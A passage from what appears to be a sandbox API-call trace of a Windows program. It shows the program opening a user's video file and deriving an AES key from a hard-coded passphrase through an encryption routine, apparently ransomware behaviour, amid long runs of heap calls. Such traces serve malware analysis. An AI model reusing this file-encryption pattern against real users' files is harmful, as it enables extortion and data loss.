12 [0097.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca658, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0097.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9ua4alpweneqzn vuiud.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0097.990] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0097.990] CloseHandle (hObject=0x258) returned 1 [0097.991] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.991] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0097.991] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e54f3e0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0xdcb950a0, ftLastAccessTime.dwHighDateTime=0x1d5eb24, ftLastWriteTime.dwLowDateTime=0xdcb950a0, ftLastWriteTime.dwHighDateTime=0x1d5eb24, nFileSizeHigh=0x0, nFileSizeLow=0x9e42, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9ua4aLpWeNEQZn vUIUd.mkv", cAlternateFileName="9UA4AL~1.MKV")) returned 0x41ac6c0 [0097.991] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0097.991] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0097.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0097.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0097.992] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.993] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0097.993] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.993] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0097.994] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.994] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca5c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0097.994] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0097.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.995] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0097.995] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac140) returned 1 [0097.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0097.995] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0097.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0097.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0097.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0097.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0097.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0097.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0097.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0097.997] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0097.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0097.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0097.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0097.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0098.000] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) 